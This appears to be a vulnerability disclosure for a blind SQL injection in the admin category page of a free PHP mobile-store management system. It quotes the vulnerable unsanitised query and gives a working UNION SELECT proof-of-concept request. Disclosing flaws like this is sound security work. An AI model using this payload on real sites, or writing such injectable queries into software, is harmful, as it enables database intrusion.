Blind SQL Injection Manage Category - Mobile Management Store.md

Sourcecodester / Mobile Management Store -Blind SQL Injection

Vendor Homepage:

https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html

Affected Component

/admin/maintenance/manage_category.php

Code

?php
require_once('../../config.php');
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `categories` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }
}
?>

Proof of Concept

HTTP Request Example

GET /admin/maintenance/manage_category.php?id=2'+AND+FALSE+UNION+SELECT+1,version(),3,4,5--+- HTTP/1.1
Host: [REDACTED]
sec-ch-ua: 
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=[REDACTED]
Connection: close

Screenshot

Credits

Russel James Avenido